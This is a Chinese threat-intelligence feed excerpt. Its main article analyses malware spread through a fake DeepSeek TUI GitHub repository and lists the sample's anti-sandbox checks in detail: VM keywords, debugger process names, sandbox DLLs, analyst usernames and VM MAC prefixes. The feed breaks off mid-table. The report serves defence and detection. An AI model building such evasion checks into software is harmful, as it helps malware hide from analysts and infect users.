窃密木马的技术成熟度和反分析能力表明，攻击者已具备开发高质量攻击工具的专业能力。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">跨平台攻击活动的发现进一步揭示了当前威胁格局的演变趋势：攻击者不再局限于单一平台，而是在多个开源生态系统中建立持续性存在，利用各平台的安全盲区实现攻击规模的扩大化。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">参考来源</span></h2><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf=""><a href="https://www.bleepingcomputer.com/news/security/fake-openai-repository-on-hugging-face-pushes-infostealer-malware/" target="_blank">https://www.bleepingcomputer.com/news/security/fake-openai-repository-on-hugging-face-pushes-infostealer-malware/</a></span></span></li></ul><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://ti.qianxin.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=9045c46b&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518656%26idx%3D1%26sn%3D86b04c00b27101115ddbf8aa955ba6b5">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 11 May 2026 10:36:00 +0800</pubDate>
    </item>
    <item>
      <title>AI软件仿冒攻击再现，DeepSeek TUI成伪装诱饵</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518651&amp;idx=1&amp;sn=08ac9790bae6de954481639889be019b</link>
      <description>奇安信威胁情报中心监测到，攻击者趁着DeepSeek TUI项目热度上升，开始混水摸鱼，在Github上构造仿冒仓库，投递恶意软件。</description>
      <content:encoded><![CDATA[<p>原创 <span>红雨滴团队</span> <span>2026-05-09 13:12</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=20863f9d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOqibGP9VflbpCQlNDosCfuAbibic3RiclhX6G1iay2Uj1jeMCA3NXoAlAZDYFLDnWiaPF9MmslibB68hYOPfMT3OQaPYtVMIGHpWmALxdk%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>奇安信威胁情报中心监测到，攻击者趁着DeepSeek TUI项目热度上升，开始混水摸鱼，在Github上构造仿冒仓库，投递恶意软件。</p>
  <h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">概述</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">开源项目DeepSeek TUI是一个为DeepSeek大模型创造的在终端中运行的编码智能体，近期随着DeepSeek v4的发布和开发者Hunter Bown的中文扩散帖，让该项目吸引到大量关注。</span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100035002" data-ratio="0.6666666666666666" data-s="300,640" type="block" data-type="png" data-w="510" src="https://wechat2rss.xlab.app/img-proxy/?k=4ab42850&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOq9pzo77gj0Xz1BsAwR8hYY2vVjegtHIe2RB5dehMO8OKIBEPWjRneWMNGnplXSZeiajwaJG9C4toF4ghck3ol24EEbecgoDRY2A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信威胁情报中心监测到，攻击者趁着DeepSeek TUI项目热度上升，开始混水摸鱼，在Github上构造仿冒仓库，投递恶意软件。下图中第一个是真正的DeepSeek TUI项目仓库，第二个是仿冒仓库。</span></p><p nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100034980" data-ratio="0.32" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-type="jpeg" data-w="800" src="https://wechat2rss.xlab.app/img-proxy/?k=7adb9fb5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOqicc6ySKIpWduRumNGFEWaI9SScCZLIxqia2ZBF8ksfJ9F235510gamczickCFmJgnZVwdYZLbeCEap3b0modwtWICBTic788hYI7c%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">恶意软件特征与我们3月披露的仿冒OpenClaw的攻击样本一致[1]，并且使用的恶意域名与国外安全厂商近期发布的报告重叠[2]，表明此类伪装成AI产品的恶意软件攻击活动持续不断，且不停更换仿冒对象。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">详细分析</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">恶意软件存放在伪造仓库的Releases页面中，不久前才上传。</span></p><p nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100034981" data-ratio="0.19625" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-type="jpeg" data-w="800" src="https://wechat2rss.xlab.app/img-proxy/?k=4a184a34&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOq8NuBCrZAVOwBwBGguX8FVWQdBvRaTCp4T6nQ9POCeJKcrxlhNgyopocQq9v8yjpSVEpSDfnYnzgDMdQykUk1F6mYkWqPXmG4E%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">下载的7z压缩包中包含的EXE文件信息如下。</span></p><table style="overflow-wrap:break-word;color:rgb(43, 48, 59);font-family:-apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size:16px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-transform:none;widows:2;word-spacing:0px;-webkit-text-stroke-width:0px;white-space:normal;text-decoration-thickness:initial;text-decoration-style:initial;text-decoration-color:initial;min-width:140px;"><tbody><tr style="overflow-wrap: break-word;"><th data-colwidth="115" align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">文件名</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">DeepSeek-TUI_x64.exe</span></p></th></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="115" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">MD5</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">b96c0d609c1b7e74f8cb1442bf0b5418</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="115" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">编译时间</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-04-29 08:53:41 UTC</span></p></td></tr></tbody></table><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">样本的属性信息如下。</span></p><p nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100034983" data-ratio="0.9186602870813397" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-type="jpeg" data-w="418" src="https://wechat2rss.xlab.app/img-proxy/?k=df46eeb2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOqicCKnpfaibmtqKtiacxUvhmGLJwF49R122keialichbE7H9z6jYjJ4ZLKibA2E4QKRUgibfNJzzKUl89AMAdV7ZS9QjA0c2WenGTicv0Y%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">（一）运行环境检测</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">样本的运行环境检测系统采用分层评分架构：TIER0（致命指标一票否决）+ TIER1/2（可疑指标积分制）。此外，后续下载的二阶段恶意软件OneSync.exe中同样存在反沙箱模块，包含”src\anti_bot.rs”、”TIER0: VirtualBox default NAT IP (10.0.2.15) detected”、”TIER0: Bot farm hostname pattern”等字符串，说明反沙箱不只存在于一级样本，二阶段组件还会独立进行环境判定。</span></p><p nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100034984" data-ratio="0.5468113975576662" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-type="jpeg" data-w="737" src="https://wechat2rss.xlab.app/img-proxy/?k=ee418d85&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOq8hYZJ1FNcVs31g1vIFDjcA5KDNGxsrqFDeerHqr8OVk3OXdR1icjEYak21APGEBzoc1Y68qbxn3yKLpSq0hyalHUsPoiaXicjpibI%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">（1） TIER0阶段检测，存在黑名单信息则直接判定为沙箱环境。</span></p><table style="overflow-wrap:break-word;color:rgb(43, 48, 59);font-family:-apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size:16px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-transform:none;widows:2;word-spacing:0px;-webkit-text-stroke-width:0px;white-space:normal;text-decoration-thickness:initial;text-decoration-style:initial;text-decoration-color:initial;min-width:184px;"><tbody><tr style="overflow-wrap: break-word;"><th data-colwidth="159" align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">检测项</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">黑名单信息</span></p></th></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="159" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">虚拟机关键词</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">hyper-v、vmware、qemu、virtualbox、parallels（大小写不敏感）</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="159" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">进程检测</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">包含ollydbg.exe、x32dbg.exe、x64dbg.exe、windbg.exe、ida.exe、ida64.exe、processhacker.exe、procexp.exe、procexp64.exe、wireshark.exe、fiddler.exe、charles.exe、sandboxie.exe、vmtoolsd.exe、vmwaretray.exe、vmwareuser.exe、vboxservice.exe、vboxtray.exe</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="159" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">沙箱监控DLL检测</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">包含cuckoomon.dll（Cuckoo 沙箱）、SbieDll.dll（Sandboxie）、SxIn.dll、cmdvrt32.dl、cmdvrt64.dll（Comodo 沙箱）加上VM驱动文件vmouse.sys、vmhgfs.sys、VBoxMouse.sys、VBoxGuest.sys、VBoxSF.sys、VBoxVideo.sys、Wasp.sys</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="159" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">黑名单用户名检测</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">包含malware、virus、sandbox、sand box、wdagutilityaccount、sample、currentuser、maltest、bruno、jzdekker、Janet Van Dyne、Harry Johnson</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="159" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">VirtualBox默认 NAT IP 检测</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">硬编码 IP 地址10.0.2.15</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="159" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">VM MAC OUI 检测</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">MAC 地址前缀黑名单包含 08:00:27（VirtualBox）、00:15:5D（Hyper-V）、52:54:00（KVM/QEMU）、00:23:45，覆盖主流虚拟化平台的默认 MAC 地址前缀</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="159" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">Bot farm主机名模式检测</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">黑名单中还预置了大量仿真实Bot farm主机名（eslmdigB、kismujmC、gpslqmrD，按字母表顺序排列的 8 字符随机串）</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="159" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">GPU预筛查</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">枚举 HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}下显示适配器子键的 DriverDesc 值，用于识别 hyper-v、vmware、virtualbox、parallels、qemu 等虚拟化显卡。</span></p></td></tr></tbody></table><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">（2）通过TIER0阶段检测的系统进入积分评估阶段，分值越大越可能是沙箱环境。</span></p><table style="overflow-wrap:break-word;color:rgb(43, 48, 59);font-family:-apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size:16px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-transform:none;widows:2;word-spacing:0px;-webkit-text-stroke-width:0px;white-space:normal;text-decoration-thickness:initial;text-decoration-style:initial;text-decoration-color:initial;min-width:161px;"><tbody><tr style="overflow-wrap: break-word;"><th data-colwidth="136" 